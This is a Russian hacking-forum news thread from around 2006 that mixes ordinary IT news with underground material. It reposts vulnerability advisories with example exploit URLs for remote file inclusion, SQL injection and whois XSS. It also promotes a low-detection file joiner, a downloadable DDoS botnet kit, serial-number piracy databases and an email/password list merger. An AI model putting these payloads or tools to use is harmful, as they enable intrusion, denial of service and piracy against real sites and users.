Архив новостей (2004-2015 год)

Статус
Закрыто для дальнейших ответов.
Отслеживать
В мировом рейтинге лучших антивирусов 1-е место досталось российскому разработчику – «Лаборатории Касперского». В первую 20-ку попал еще один отечественный антивирус - Dr. Web.
Аналитики Virus.gr протестировали антивирусы различных производителей, чтобы определить лучший из них. В исследовании использовали более 147 тыс. образцов вирусов, последние версии антивирусного ПО разных производителей, а также компьютер P4 под управлением Windows XP Professional SP1. Антивирусы были настроены на максимальный результат, что значит, что число ложных срабатываний было больше, чем при настройке "по умолчанию".
Результаты были ранжированы по доле зафиксированных вирусов. Полученный рейтинг антивирусных продуктов выглядит следующим образом: Kaspersky версия 6.0.0.303, Active Virus Shield by AOL версия 6.0.0.299, F-Secure 2006 версия 6.12.90, BitDefender Professional версия 9, CyberScrub версия 1.0, eScan версия 8.0.671.1, BitDefender 8.0.202, BullGuard 6.1, AntiVir Premium 7.01.01.02, Nod32 v2.51.30.
 


Загружаем в прогу 2 текстовых файла
к примеру:
123456 mail1@mail.ru
1234567 mail2@mail.ru
12345678 mail3@mail.ru
Вида:
mail1@mail.ru 12345
mail2@mail.ru 54321
mail3@mail.ru 56789
mail4@mail.ru 98765

Жмем - Генерить - и получаем такой результат:

123456 mail1@mail.ru 12345
1234567 mail2@mail.ru 54321
12345678 mail3@mail.ru 56789
:zns5: Скачать|Download
 
Программное обеспечение AOL ICQ - потенциальная возможность для атак
b_toolbar.jpg

Core Security предупреждает относительно многочисленных уязвимостей в программном обеспечении AOL ICQ. ICQ Pro 2003b и ICQ панель для Internet Explorer содержат уязвимость, которая может быть использована для атак.
Программная ошибка в ICQ Pro 2003b разрешает специальные сообщения, которые могут вызвать переполнение памяти в куче, которое может быть эксплуатировано. Уязвимости обнаружена с помощью специальной fuzzing-утилиты. Согласно сводке уязвимостей, ICQ 5.1 и ICQ2Go! не подвержены этой уязвимости и Core Security предлагает обновиться до ICQ 5.1
Так же ICQ панель для Internet Explorer недостаточно контролирует входящие данные. Код скрипта, содержащийся в данных RSS, может быть выполнен в пределах локалького Internet Explorer. Это дает практически неограниченные правда на скачивание и запуск программ. Можно так же управлять различными настройками панели. Уязвимая версия - 1.3, версий с закрытой уязвимостью пока нет. AOL предлагает перейти на версию 1.2, не поддерживающую RSS и поставляемую с ICQ 5.1.

Перевод: Great
 
C-News v 1.0.1 < = Multiple Remote File Include Vulnerabilities
Дата: 10 сентября 2006 г.
Автор: ThE__LeO
ПО: C-News v 1.0.1
Описание:
Входные данные в параметре path не достаточно фильтруются перед использованием, что и позволяет заинклудить удаленный файл.
Примеры:
Код: 
http://Www.Example.Com/[Script]/affichage/pagination.php?path=[U r Evil Script] 
http://Www.Example.Com/[Script]/affichage/formulaire_commentaires.php?pa
th=[U r Evil Script]
источник: www.securityfocus.com
 
13 сентября обычного и 12 сентября високосного года - это очень хороший день.

И сегодня, 13 сентября, в 256-й день года, великий праздник - День Программиста!
Ура, товарищи! :pioneer:
Поздравляю всех присутствующих с профессиональным и околопрофессиональным праздником, желаю стабильного компила и отстутствия необходимости дебага :)

Ну а себя, в добавок, поздравляю с ещё одним праздником - исполнился год моему любимому компьютеру B)



WBR, Ma-stiff.

:baby:
 
Проект Free-Joiner - новое дыхание
http://joiner.xss.pro/i/logotip.gif
Проект free joiner открыт под нашим началом. Теперь он располагается по адресу http://joiner.xss.pro/. Также на нашем форуме открыт раздел О проекте free-joiner. Открытие проекта обсуждается в этой теме. У сайта новый дизайн, логотим и стиль, который сделал наш незаменимый дизайнер - Berkut.
для тех кто не в курсе: free-joiner это бесплатный постоянно обновляющийся (а следовательно и малопаленый) склейщик файлов. ну вы конечно уже поняли, что написан он без злого умысля, а всего лишь для личного использования и администрация данного сайта валяется у вас в коленях: не использовать продукт в целях противоречащих законодательству какой либо страны ;) Ну вобщем вы поняли, следим за обновлениями, благодарим автора.
Все инновации и советы постим в соответствующий раздел портала, который регулярно перечитывает автор джойнера.[New$paN]
 
Совсем недавно было обнаружено набор дырявых сценариев в php скриптах ХуИз сервисов. Кроме глупых приколов, эти XSS хранят опасность для регистраторов.
Вот примеры бажных сервисов:
http://www.webnames.ru/scripts/whois.pl?domain_name=xnic.org (аккредитованный регистратор .RU/.SU)
http://pir.org/Search/WhoIsSearchResults.a...hoIsSearch=xnic (держатель зоны .ORG)
http://who.godaddy.com/whois.aspx?domain=xnic.org (крупнейший в мире регистратор международных зон)
http://www.networksolutions.com/whois/ (первый регистратор международных зон)
http://reports.internic.net/cgi/whois?whoi...org&type=domain
http://www.gandi.net/whois (крупнейший французский регистратор)
https://secure.netfirms.com/signup/us-en/si...inname=xnic.org
http://whois.pp.ru
Уязвимы не все регистраторы.
Профиксить багу можно так:
Код: 
echo nl2br(htmlspecialchars($whois));
Источник: web-hack.ru[New$paN]
 
Компания AOL – владелец бренда ICQ – рекомендует срочно обновить пользователям клиент ICQ Pro 2003b на самый последний, например, ICQ 5.1, если они не хотят стать жертвами хакеров.
2003bpr_o.jpg

ICQ Pro 2003b – хоть и довольно стара, но все же ей пользуется достаточно большая доля подписчиков этой IM-сети. AOL утверждает, что экспертам по компьютерной безопасности удалось создать специальный вирус, позволяющий выводить ICQ из строя и, теоретически, запускать на пораженном компьютере произвольный код.

Для успешной атаки хакеру достаточно отправить жертве специальным образом составленное сообщение, а компьютер будет поражен вне зависимости от того, откроет жертва сообщение или нет - достаточно, чтобы &quot;аська&quot; была просто подключена к серверу.
 
Злая тима выпустила релиз для работы с прокси.
Программа на данный момент тестовая,тк 1 версия :)
Она измеряет скорость соединения прокси с icq сервером.
Список сервероВ можно изменять (spi.INI)
Тк что туда можно не только пихать сервера icq ^)
:zns5: Скачать|Download
Список серверов
Источник: zloy.org
 
st.jpg

С помощью этой программы вы можете собирать и организовать серийные номера к вашим программам. Вы можете с лёгкостью просматривать, добавлять или редактировать ваши серийные номера, имеется также очень комфортная система поиска. А если вы или ваша группа занимвется релизами серийных номеров, вы можете использовать очень комфортную систему релизов!

Если же вы просто пользователь, желающий использовать коллекцию серийных номеров Serials Treasury, то сначала вам нужно скачать одну из версий Serials Treasury:
:zns5: Скачать|Download

Обновления баз серийных номеров доступны на следующих страницах:

http://www.serialz.to/s2kupdates.html
http://avenger.tendency.ru/index.php?page=download-updates
http://hottabich.hotbox.ru/
 
На сайте открыта иностранная секция
По многочисленным просьбам наших (в честности Тилана) буржуйских забугровых друзей, была открыта ИНОСТРАННАЯ СЕКЦИЯ. Общаться в ней можно ТОЛЬКО на английском. Поддержите стартовавшую только что секцию, посмотри что из этого выйдет.[New$paN]
 
Компания WebEx в сотрудничестве с AOL сегодня выпустила финальную версию совместной разработки AIM Pro Business Edition, через 2 месяца после начала бета тестирования. Программа предназначена для крупных предприятий и является расширенной версией приложения AIM Pro, использующегося в малом и среднем бизнесе.
1158166133-1.jpg

WebEx AIM Pro Business Edition позволяет развернуть и управлять IM-инфраструктурой всего предприятия, основываясь на применении платформы AOL's Triton. Платформа, кроме поддержки основных функций AIM, позволяет проводить онлайн конференции, а также производить презентации с применением технологии desktop sharing, разработанной WebEx. Однако WebEx отмечает, что для крупных организаций главным является стабильная работа выделенного сервера для приложения.

Как и AIM Pro, Business Edition включает шифрование сообщений и высокий уровень безопасности, наряду с возможностями голосовой и видео связи, предоставленными WebEx MediaTone Network. Отличительной особенностью Business Edition является цена, дифференцированная в зависимости от запросов клиента. Финальная версия совместима с AOL AIM, ICQ, Apple iChat и Outlook. Программа уже доступна для скачивании.

:zns5: Скачать|Download
 
Сборник - Альманах программиста
http://news.xss.pro/almanah_progr.gif

Альманах программиста 1. ADO.NET, MS SQL Server, доступ к данным из приложений
Альманах представляет собой тематические подборки статей и документации из Microsoft MSDN Library и журнала “MSDN Magazine” по наиболее интересным и актуальным для широкого круга программистов технологиям. В альманахе используются не только статьи, уже публиковавшиеся в журнале “MSDN Magazine/Русская Редакция”, но и материалы, переведенные специально для данного издания. Номер посвящен работе с базами данным и охватывает три основные темы: «Технология доступа к данным Microsoft ADO.NET», «Microsoft SQL Server», «Доступ к данным из приложений»
Первый том альманаха, посвященный работе с базами данных, состоит из трех тематических рубрик.
• Технология доступа к данным Microsoft ADO.NET. Подробно описывается архитектура доступа к данным на платформе .NET, поясняются концепции и реализация ADO.NET, показывается, что представляют собой выражения (expressions) в ADO.NET, как создавать собственные провайдеры данных и управлять транзакциями.
• Microsoft SQL Server. Подборка материалов за период 2001-2002 гг. по оптимизации SQL-запросов, использованию сценариев в SQL, объектной модели SQL-DMO в SQL Server 7.0 и SQL Server 2000, созданию хранимых процедур SQL Server для автоматизации доставки информации в XML-формате из базы данных в клиентские компоненты, службе Notification Services, а также по новым возможностям и практическому применению SQL Server CE 2.0 для мобильных устройств.
• Доступ к данным из приложений. Материалы по динамическому связыванию уровня данных с хранимыми процедурами и командами
SQL через механизм .NET Reflection, использованию ADO.NET-обьектов DataRelation, операциям над иерархическими наборами строк, созданию уровня доступа к данным через компонент DataManager (для тех, кто пока работает с ADO), сбору информации от Web-сайтов и каталогов с применением ADO.NET, реализации универсального средства отображения данных на основе СОМ+ или MTS (Microsoft Transaction Services), выполнению локальных и распределенных транзакций в .NET-приложениях, созданию транзакций в ADO.NET.
Описание остальных томов читаем далее...[New$paN]:
:zns5: Скачать|Download

Альманах программиста 2. Microsoft ASP.NET, Web-сервисы, Web-приложения
• Microsoft ASP.NET. Аутентификация в ASP.NET, написание безопасного ASP.NET-кода, обнаружение попыток несанкционированной модификации ASP.NET-приложений, состояние отображения (view state) ASP.NET-страниц, концепция отделенного кода (codebehind), программирование форм в ASP.NET, потоки и асинхронные обработчики в серверном Web-коде, перехват Web-запросов через HTTP-фильтры в ISAPI и ASP.NET, HTTP-конвейеры, развертывание ASP.NET-приложений с помощью Visual Studio .NET.
• Web-сервисы. Технологии защиты Web-сервисов, взаимодействие между Web-сервисами, формат используемых ими сообщений, определение обязательных заголовков в SOAP-сообщениях, обмен информацией между документами Office XP и Web-сервисами, автоматизированное создание Web-сервиса в Visual Studio .NET.
• Другие Web-приложения. ASP.NET Starter Kits для быстрого освоения приемов разработки Web-сайтов, средства аутентификации и проверки форм в приложениях электронной коммерции, создание Web-приложений, взаимодействующих с любыми мобильными устройствами, тестирование Web-приложений под нагрузкой, настройка визуального представления сайта ASP.NET на основе XML-классов.
:zns5: Скачать|Download

Альманах программиста 3. Платформа 2003 Windows 2003 сервер IIS 6.0 Office System
• Microsoft Windows Server 2003. Обзор Windows Server 2003 для программистов, новые API ядра, отладки, защиты, векторная обработка исключений (VEH), сервис Encrypting File System.
• Microsoft Internet Information Services 6.0. Технический обзор всех новшеств и усовершенствований, введенных в Internet Information Services (IIS) 6.0.
• Microsoft Office System. Описание Microsoft Visual Studio Tools for Microsoft Office System (новой технологии, позволяющей задействовать богатые возможности Visual Studio .NET и .NET Framework при разработке приложений на основе Microsoft Word 2003 и Excel 2003), приемы работы с Office InfoPath 2003, а также программирование на С# и Visual Basic .NET с использованием объектных моделей Microsoft Word 2003 и Excel 2003
:zns5: Скачать|Download

Альманах программиста 4 Безопасность в .NET
• Шифрование. Пространство имен Cryptography в .NET Framework и его применение для шифрования по различным алгоритмам, шифрование с применением AES (Advanced Encryption Standard), хэширование паролей, атрибут AllowParti ally Trusted Callers, использование приемников каналов асимметричного шифрования для защиты трафика .NET Remoting.
• Защита кода и данных. Модель защиты по нравам доступа кода, обзор расширений S4U Kerberos в Windows Server 2003, новые средства IIS 6.0 для надежной защиты информации и серверных процессов, ролевая защита на основе Authorization Manager в .NET-приложениях, защита SOAP-пакетов на основе WS-Security и приемников каналов Remoting, рекомендации по выявлению уязвимостей в вашем коде, затемнение кода для пресечения попыток обратного проектирования вашего кода, написанного на Visual Basic .NET или С#, закрытие доступа к строкам подключения баз данных и другим секретным параметрам в коде, типичные механизмы вирусных атак, архитектура защищенного автономного приложения и средства безопасной аутентификации через Microsoft .NET Passport.
:zns5: Скачать|Download
 
ex204 DDos System
Замечательный релиз от наших коллег с cup.su представляет собой небольшой шелл ботнет (или как модно говорить - система распределения мощностей).
Пакет состоит из Get DDOS модуля на Perl, установщика скрипт-ботов и контроль-центра. В скриптах заведомо допущена ошибка, так как всё афишируемое создано только для личного ознакомления и предупреждения опасных ситуаций в сети. Тестирование было произведено с использованием Perl v5.8.8 built for MSWin32-x86-multi-thread и PHP 4. Для корректного функционирования потребуются два текстовых файла Bots.txt и Shells.txt.
Скрипт системы поможет протестировать ваши приложения и ПО на традиционную флуд-атаку GET запросом.
Закачка далее>>>[New$paN]
:zns5: Скачать|Download
Релиз был кинут авторами в паблик на cup.su в связи с чрезмерным интересом барыг к нему.
 

freeofcharge - это система, которая совершает вызовы в заданных направлениях и маршрутизирует звонки друг в друга.

[New$paN]Проще говоря - это сервис, позволяющий заказать callback на ваш телефон (или совершить анонимный звонок, соответственно).

Такой штукой могут пользоваться только Москвичи..

Юзайте .. рассказывайте что получилось
 
MailRu запустила тестирование почтового интерфейса нового поколения
Почтовая служба Mail.Ru объявила о запуске в тестовую эксплуатацию почтового интерфейса нового поколения, полностью построенного на технологиях AJAX (Asynchronous Javascript and XML). Задача нового интерфейса - создать для пользователя наиболее комфортные условия работы с почтой и минимизировать временные затраты.
Функционал нового интерфейса, расположенного по адресу: http://pro.mail.ru, максимально приближен к популярным почтовым клиентам, таким, как Outlook и The Bat, - теперь миллионы пользователей получат более удобный инструмент работы со своей корреспонденцией.
Обновленный функционал даст возможность просматривать на одной странице одновременно и список писем, и текст одного из них (функция "предварительный просмотр"). Все действия - такие, как переход между письмами, поиск, написание и отправка письма, - будут осуществляться без перезагрузки страницы.
В новой версии почты Mail.Ru также будет реализована функция drag-n-drop (перетаскивание объектов при помощи мыши) и появятся контекстные меню, открывающиеся по клику правой кнопкой мыши на объекте.
"Мы достаточно давно используем элементы AJAX в своих проектах, - говорит генеральный директор Mail.Ru Дмитрий Гришин. - Однако почтовый интерфейс, полностью построенный на AJAX-технологиях, - это, можно сказать, прорыв в этом направлении.
Российские пользователи получат веб-интерфейс, по удобству использования не уступающий клиентским приложениям. При этом сохраняются все преимущества веб-почты - доступ к архиву сообщений с любого компьютера из любой точки планеты и отсутствие необходимости полной загрузки сообщений на компьютер перед просмотром.
Фактически у пользователя больше нет причин использовать почтовые программы, и его работа с почтой окончательно перестает быть привязана к конкретному компьютеру"
Источник: Газета "Новые Известия"
 
Woltlab Burning Board 2.3.X - SQL Injection Vulnerability
Описание:
Не достаточно фильтруется параметр page в thread.php
Пример:
Код: 
http://127.0.0.1/wbb2/thread.php?threadid=1&page=-1
 
eXV2 - SQL injection
Дата Выпуска: 2006-09-22
Уровень: Умеренно критический
Воздействие: Манипуляция данными
Решение: Не исправленно
ПО: eXV2
Версия: 2.x
Описание:
Входящие данные в параметре "sort" в modules/messages/index.php, должным образом не проверяются перед использованием в SQL запросе. Это может эксплуатироваться, чтобы управлять запросами SQL, вводя произвольный коде SQL.
Пример:
Код: 
http://site.com/modules/messages/index.php?sort=CODE

secunia.com
 
Статус
Закрыто для дальнейших ответов.
Верх